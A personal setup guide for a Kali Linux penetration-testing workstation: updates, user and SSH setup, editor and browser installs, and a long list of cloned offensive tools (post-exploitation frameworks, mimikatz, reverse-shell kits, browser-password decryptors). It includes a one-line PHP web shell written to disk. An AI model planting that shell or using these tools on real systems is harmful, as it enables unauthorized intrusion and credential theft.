
Kali setup and installs

Initial setup

# Refresh the package metadata and bring every installed package up to date.
sudo apt-get clean \
  && sudo apt-get update \
  && sudo apt-get upgrade -y \
  && sudo apt-get dist-upgrade -y

# Reboot afterwards so a new kernel or upgraded services are actually in use.
sudo reboot

Add an additional user (a day-to-day account so you are not working as root):

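# Create the day-to-day account. -m creates the home directory; -s sets the
# login shell up front, which makes the separate chsh step unnecessary.
sudo useradd -m -s /bin/bash glasgow
sudo passwd glasgow

# Group membership:
#   sudo   - may run commands as root
#   vboxsf - access to VirtualBox shared folders
#   docker - may talk to the Docker daemon socket. NOTE: this is effectively
#            root-equivalent (a member can start a container with the host
#            filesystem mounted), so only grant it to an account you already
#            treat as an administrator.
sudo usermod -a -G sudo,vboxsf,docker glasgow
# same thing one group at a time:
# sudo usermod -a -G docker glasgow
# sudo usermod -a -G sudo glasgow
# sudo usermod -a -G vboxsf glasgow

# Only needed if the account was created without -s:
# sudo chsh -s /bin/bash glasgow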

Regenerate the default SSH host keys (if this box came from a prebuilt image, every copy of that image shares the same host keys, so replace them before exposing sshd)

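# Move the existing host keys aside. This has to happen first because
# dpkg-reconfigure only generates keys that are missing.
# Absolute paths throughout so nothing depends on (or changes) the shell's cwd.
sudo mkdir -p /etc/ssh/default_kali_keys
sudo mv /etc/ssh/ssh_host_* /etc/ssh/default_kali_keys/

# Regenerate the keys:
sudo dpkg-reconfigure openssh-server

# Verify the new keys really differ from the old ones. ssh-keygen -l prints the
# fingerprint clients will see and works on the world-readable .pub files, so
# no root is needed (md5sum on the private keys, as in the original note, fails
# without sudo because they are mode 0600).
for pub in /etc/ssh/ssh_host_*.pub; do ssh-keygen -lf "$pub"; done
for pub in /etc/ssh/default_kali_keys/*.pub; do ssh-keygen -lf "$pub"; done

# If sshd was already running, restart it so it serves the new keys:
# sudo systemctl restart ssh
# Once verified, do not leave the old private keys lying around on disk:
# sudo rm -rf /etc/ssh/default_kali_keys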

Configure git:

# Identity recorded on commits made from this box (a local placeholder
# address rather than a real one).
git config --global user.name  "Glasgow"
git config --global user.email "Glasgow@localhost"

Install Anaconda:

https://www.anaconda.com/distribution/

Removing Anaconda:

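# remove the install directory
rm -rf -- ~/anaconda3

# The installer appends a PATH line to the shell rc file; locate it and delete
# it by hand. (A /root/... path means the installer was run as root, so run
# this cleanup as that same user.)
grep -n 'anaconda3' ~/.bashrc
# the line to look for resembles:
# export PATH="/root/anaconda3/bin:$PATH"

# remove hidden files
rm -rf -- ~/.condarc ~/.conda ~/.continuum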

Install Atom (Text Editor)

https://flight-manual.atom.io/getting-started/sections/installing-atom/

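# NOTE: Atom was sunset upstream (repository archived December 2022), so this
# download may no longer be served; kept for reference.
# -O is needed: without it wget saves the file as "deb" (the last path
# component of the URL), which the install line below would not find.
wget -O atom-amd64.deb https://atom.io/download/deb
# Install Atom via apt so its dependencies are resolved in the same step.
# As with any package installed from outside the apt repositories, this .deb is
# trusted on the strength of the HTTPS download alone - no signature or
# published checksum is checked here.
sudo apt install ./atom-amd64.deb
# older two-step equivalent:
# sudo dpkg -i atom-amd64.deb
# sudo apt-get -f install   # pull in any dependencies that were missing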

Install packages

# Atom packages, one per line so the list is easy to edit.
apm install \
  atom-beautify \
  autocomplete-python \
  file-icons \
  highlight-selected \
  minimap \
  minimap-highlight-selected \
  open-recent \
  pdf-view \
  seti-ui \
  sort-lines \
  split-diff

Other packages I've used in the past:

linter
linter-flake8
linter-ui-default
python-autopep8

Install Google Chrome

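# Fetch Google's .deb into ~/Downloads and install it with apt, which resolves
# its dependencies in one step (the original mixed gdebi and dpkg -i and
# pointed them at two different paths). Like any package installed from
# outside the apt repositories it is trusted on the strength of the HTTPS
# download alone; the package normally adds Google's apt repository (check
# /etc/apt/sources.list.d/ afterwards) so later updates come signed via apt.
wget -P ~/Downloads https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
sudo apt install ~/Downloads/google-chrome-stable_current_amd64.deb
# older equivalents:
# sudo apt-get install gdebi && sudo gdebi ~/Downloads/google-chrome-stable_current_amd64.deb
# sudo dpkg -i ~/Downloads/google-chrome-stable_current_amd64.deb && sudo apt-get -f install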

Note that Chrome refuses to run as root, so launch it as another user. If you do that from a root X session you may need to grant that user access to the display: use `xhost +SI:localuser:glasgow` rather than a bare `xhost +`, which switches off X access control for every host.

Apache Directory Studio

ApacheDirectoryStudio - LDAP Viewer

IDA

idafree

PyCharm

https://www.jetbrains.com/pycharm/download/#section=linux

Cutter

https://cutter.re/

Linux Packages

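# Same refresh as in "Initial setup". Every stage needs root, not just the
# first one (the original line only put sudo on apt-get clean).
sudo apt-get clean && sudo apt-get update && sudo apt-get upgrade -y && sudo apt-get dist-upgrade -y

# Install guest additions
# sudo apt-get install -y virtualbox-guest-x11
# reboot

# Docker (anyone in the docker group is effectively root on this box - see the
# user setup above)
sudo apt install docker.io

# Some miscellaneous downloads (-y on every line so the list runs unattended)
sudo apt-get install -y ipython3
sudo apt-get install -y gobuster
sudo apt-get install -y jq

sudo apt-get install -y cifs-utils
sudo apt-get install -y ncftp
sudo apt-get install -y filezilla filezilla-common
sudo apt-get install -y libreoffice
sudo apt-get install -y bleachbit
sudo apt-get install -y steghide
sudo apt-get install -y mcrypt
sudo apt-get install -y gimp
sudo apt-get install -y putty-tools
sudo apt-get install -y exiftool
sudo apt install -y pandoc
sudo apt install -y lynx
sudo apt install -y lolcat  # installs into /usr/games - add that directory to PATH


# buffer overflow stuff
sudo apt-get install -y ropper
gem install one_gadget   # system-wide needs root (sudo); as a plain user gem typically falls back to a per-user install

# ARM executable
# apt-get install qemu

#apt-get install tor
#service tor start # Check additional steps involving "tor bundle"
#apt-get install keepass2 -y
#apt-get install jd-gui #jar decompiler
#apt-get install rpcbind -y # for 'rpcinfo'
#apt-get install nfs-common -y # for 'showmount'

#apt install mono-mcs    # used to compile c# programs
#apt-get install mingw-w64   # this is to compile windows headers (c/c++)
#apt-get install gcc-multilib
#apt-get install redis

# apt-get install thunderbird

# pdf utilities (read from command line; etc.)
# https://www.howtogeek.com/228531/how-to-convert-a-pdf-file-to-editable-text-using-the-command-line-in-linux/
# apt-get install poppler-utils

sudo apt-get install -y pdfcrack

sudo apt-get install -y bruteforce-salted-openssl

# apt-get install preload # Preload application (pre-loads binaries and dependancies of most commonly used applications)

# wine is used to run windows exe's
# dpkg --add-architecture i386 && apt-get update && apt-get install wine32

# Download OpenVAS
# additional info @ https://www.kali.org/penetration-testing/openvas-vulnerability-scanning/
# apt-get install openvas -y
# openvas-setup
# (on current Kali the package and setup script are named gvm / gvm-setup)

# apt-get install nbtscan-unixwiz

# Linux Priv Checker - the original note pointed at a Google redirect URL; the
# direct link it decoded to is below, and the same script is cloned from
# GitHub in the "Github" section.
# https://www.securitysift.com/download/linuxprivchecker.py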

Github

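# Everything in this section is cloned straight from GitHub: unpinned,
# unsigned, and in a few cases executed right away (install.sh, setup.py).
# Read what you pull before running it, and consider checking out a commit you
# have reviewed instead of HEAD. All clones now land under ~/opt (the original
# notes dropped some into the current directory and some into a mistyped
# "~~/opt", which bash does not tilde-expand), and nothing here changes the
# shell's working directory any more.
mkdir -p ~/opt

# SecLists is a collection of multiple types of lists used during security assessments. List types include usernames, passwords, URLs, sensitive data grep strings, fuzzing payloads, and many more.
# /usr/share is root-owned, hence sudo; the symlink is created in a subshell so
# the cd does not leak into the commands that follow.
sudo git clone https://github.com/danielmiessler/SecLists.git /usr/share/wordlists/SecLists
(cd /usr/share && sudo ln -s wordlists/SecLists/ seclists)  # creates symbolic link (for Reconnoitre)
### alternatively, just run: sudo apt -y install seclists


# Reconnoitre (nmap and sparta alternative)
git clone https://github.com/codingo/Reconnoitre.git ~/opt/Reconnoitre

# https instead of git@github.com: the SSH form needs a key registered with
# GitHub, which a fresh box does not have, and a read-only clone does not need one.
git clone https://github.com/codingo/VHostScan.git ~/opt/VHostScan
# sed 's/$/.\%s/g' /usr/share/wordlists/SecLists/Discovery/DNS/fierce-hostlist.txt #> ~/opt/virtual-host-discovery/SecLists_fierce-hostlist.txt

# Python PTY backdoors - full PTY or nothing!
git clone https://github.com/infodox/python-pty-shells.git ~/opt/python-pty-shells

git clone https://github.com/trustedsec/unicorn.git ~/opt/unicorn

# Exploit Suggesters and enumeration
git clone https://github.com/sleventyeleven/linuxprivchecker.git ~/opt/Enumeration/Linux/linuxprivchecker
git clone https://github.com/mzet-/linux-exploit-suggester.git ~/opt/Enumeration/Linux/linux-exploit-suggester
git clone https://github.com/NullArray/MIDA-Multitool.git ~/opt/Enumeration/MIDA-Multitool
git clone https://github.com/NullArray/RootHelper.git ~/opt/Enumeration/RootHelper
git clone https://github.com/diego-treitos/linux-smart-enumeration.git ~/opt/Enumeration/Linux/linux-smart-enumeration
git clone https://github.com/carlospolop/linPE.git ~/opt/Enumeration/Linux/linPE
git clone https://github.com/InteliSecureLabs/Linux_Exploit_Suggester.git ~/opt/Enumeration/Linux/Linux_Exploit_Suggester
git clone https://github.com/rebootuser/LinEnum.git ~/opt/Enumeration/Linux/LinEnum

# Windows privesc
git clone https://github.com/pentestmonkey/windows-privesc-check.git ~/opt/Enumeration/Windows/windows-privesc-check

# PowerShell
git clone https://github.com/samratashok/nishang.git ~/opt/nishang
git clone https://github.com/Mr-Un1k0d3r/ThunderShell.git ~/opt/ThunderShell
git clone https://github.com/Mr-Un1k0d3r/PowerLessShell.git ~/opt/PowerLessShell

# NEET - Network Enumeration and Exploitation Tool
git clone https://github.com/JonnyHightower/neet.git ~/opt/neet

git clone https://github.com/alias1/sparty.git ~/opt/sparty

# PowerSploit - A PowerShell Post-Exploitation Framework (some directory lists under PowerSploit/Recon/Dictionaries/)
git clone https://github.com/PowerShellMafia/PowerSploit.git ~/opt/PowerSploit

# phpbash
git clone https://github.com/Arrexel/phpbash.git ~/opt/phpbash

# RsaCTFTool (to crack weak public rsa key)
### from github readme:
git clone https://github.com/Ganapati/RsaCtfTool.git ~/opt/RsaCtfTool
sudo apt-get install libgmp3-dev libmpc-dev
# requirements.txt lives inside the clone, so run pip from there (the original
# ran it from whatever directory the shell happened to be in).
(cd ~/opt/RsaCtfTool && pip3 install -r requirements.txt)
# usage: python3 ~/opt/RsaCtfTool/RsaCtfTool.py


# libnum (needed for RsaCTFTool)
git clone https://github.com/hellman/libnum.git ~/opt/libnum
# --user: a plain "setup.py install" tries to write into the system site-packages
(cd ~/opt/libnum && python3 setup.py install --user)

# ImageTragick - https://github.com/jpeanut/ImageTragick-CVE-2016-3714-RShell.git

# peda
git clone https://github.com/longld/peda.git ~/peda
# append only once - re-running these notes used to add a duplicate source line
grep -qxF 'source ~/peda/peda.py' ~/.gdbinit 2>/dev/null || echo "source ~/peda/peda.py" >> ~/.gdbinit
echo "DONE! debug your program with gdb and enjoy"

# NfSpy - an ID-spoofing NFS client
git clone https://github.com/bonsaiviking/NfSpy ~/opt/NfSpy

# Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent.
# The installer makes system-wide changes - read it before running it. (The
# EmpireProject repo is archived upstream; BC-SECURITY/Empire is the maintained
# fork at time of writing.)
git clone https://github.com/EmpireProject/Empire ~/opt/Empire
bash ~/opt/Empire/setup/install.sh

# PowerUpSQL: A PowerShell Toolkit for Attacking SQL Server
git clone https://github.com/NetSPI/PowerUpSQL ~/opt/PowerUpSQL

# socat-shell
git clone https://github.com/cornerpirate/socat-shell.git ~/opt/socat-shell

# dirsearch - dirsearch is a simple command line tool designed to brute force directories and files in websites.
git clone https://github.com/maurosoria/dirsearch.git ~/opt/dirsearch

# firepwd.py, an open source tool to decrypt Mozilla protected passwords
git clone https://github.com/lclevy/firepwd.git ~/opt/firepwd

# Firefox Decrypt is a tool to extract passwords from Mozilla (Firefox/Thunderbird/Seabird) profiles
git clone https://github.com/unode/firefox_decrypt.git ~/opt/firefox_decrypt

# responder
# git clone https://github.com/SpiderLabs/Responder
sudo apt install responder

# pwnedOrNot (checks for emails in data breaches)
git clone https://github.com/thewhiteh4t/pwnedOrNot.git ~/opt/pwnedOrNot

# mimikatz
git clone https://github.com/gentilkiwi/mimikatz.git ~/opt/mimikatz

# virtual-host-discovery
git clone https://github.com/jobertabma/virtual-host-discovery.git ~/opt/virtual-host-discovery
# Append ".%s" to every hostname (presumably a printf-style slot the tool fills
# with the target domain). The original double-quoted "s/\$/\.\%s/g" reaches
# sed as this same substitution, just harder to read.
# sed "s/\$/\.\%s/g" /usr/share/wordlists/SecLists/Discovery/DNS/fierce-hostlist.txt > ~/opt/virtual-host-discovery/wordlist_2.txt
sed 's/$/.%s/' /usr/share/seclists/Discovery/DNS/fierce-hostlist.txt > ~/opt/virtual-host-discovery/wordlist_2.txt

# hash_extender
git clone https://github.com/iagox86/hash_extender.git ~/opt/hash_extender

# eviler-winrm
git clone https://github.com/swarley/eviler-winrm.git ~/opt/eviler-winrm

# ropstar
git clone https://github.com/xct/ropstar.git ~/opt/ropstar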

Python Packages

pip installs:

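# On older Kali "pip" was Python 2 and "pip3" Python 3; the original mixed the
# two. Everything here is installed explicitly for Python 3 through the
# interpreter so they cannot be confused. Nothing is version-pinned, so each
# line pulls the current PyPI release plus whatever it depends on. On current
# Kali a bare system-wide install may be refused (externally-managed
# environment) - use a venv or pipx, or add --user.
python3 -m pip install pwntools
python3 -m pip install pyftpdlib

python3 -m pip install yq # https://github.com/kislyuk/yq (jq for yaml / xml)
python3 -m pip install awscli

# https://jupyter.org/install
python3 -m pip install jupyter

#pip3 install stego-lsb # https://github.com/ragibson/Steganography#WavSteg
#pip3 install stegcracker # https://github.com/Paradoxis/StegCracker

python3 -m pip install termcolor

# oletools
### https://github.com/decalage2/oletools
# pip install -U oletools

# truffleHog - Searches through git repositories for secrets, digging deep into commit history and branches. This is effective at finding secrets accidentally committed.
### https://github.com/dxa4481/truffleHog
# pip3 install truffleHog

python3 -m pip install pymysql # from craft HTB machine

python3 -m pip install web3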

Ruby Gems:

## gem install mdless  # markdown viewer for the terminal - not installed, it rendered code blocks poorly

Miscellaneous

PHP Script for code execution

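# simple script for php code execution
# WARNING: this is an unauthenticated web shell - wherever it ends up being
# served, anyone who can reach the URL can run commands as the web server user.
# Drop it only on hosts you are authorized to test, and remove it when done.
mkdir -p ~/opt/php
# quoted heredoc: nothing inside is expanded, so the $ needs no escaping
cat > ~/opt/php/cmd.php <<'EOF'
<?php echo system($_REQUEST['var']); ?>
EOF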

Rebuild Metasploit Cache (fix slow search)

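# Module search is slow until the module cache lives in the database.
# These steps need root, so use sudo rather than assuming a root shell.
# enable --now starts postgresql immediately and on every boot (the systemd
# equivalent of "service start" plus "update-rc.d enable").
sudo systemctl enable --now postgresql
sudo msfdb init
# NOTE(review): recent Metasploit releases maintain the cache themselves and
# may no longer have db_rebuild_cache; if it reports an unknown command, just
# start msfconsole with the database up.
msfconsole -x "db_rebuild_cache"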

Enable Auto-login user

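# Auto-login skips the password prompt entirely: anyone with console access to
# the machine (or to the VM) lands in a session as the named user without
# authenticating. If you enable it at all, prefer a non-root account, and leave
# it off on anything that holds client data.
# The file is root-owned, so edit it through sudoedit (an editor started as the
# normal user cannot save it).
sudoedit /etc/gdm3/daemon.conf
# --> uncomment these two lines:
# AutomaticLoginEnable = true
# AutomaticLogin = root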

Periodic Clean-up

#uninstalling unnecessary programs and packages:
# Uninstall packages that were pulled in as dependencies and are no longer
# needed by anything installed.
sudo apt-get autoremove -y

# Empty the downloaded-package cache under /var/cache/apt.
sudo apt-get clean -y

To fix the SSL_ERROR_RX_RECORD_TOO_LONG error when proxying Firefox through Burp

  1. within Firefox: about:config
  2. search for security.tls.version.max
  3. Update the value from 4 (default, TLS 1.3) to 3 (TLS 1.2)
  Note: this caps the TLS version Firefox negotiates with every site, not just the proxied target, so set it back to 4 when you are done with Burp (newer Burp releases handle TLS 1.3, in which case the change is not needed at all).

Firefox Add-on:
* https://www.wappalyzer.com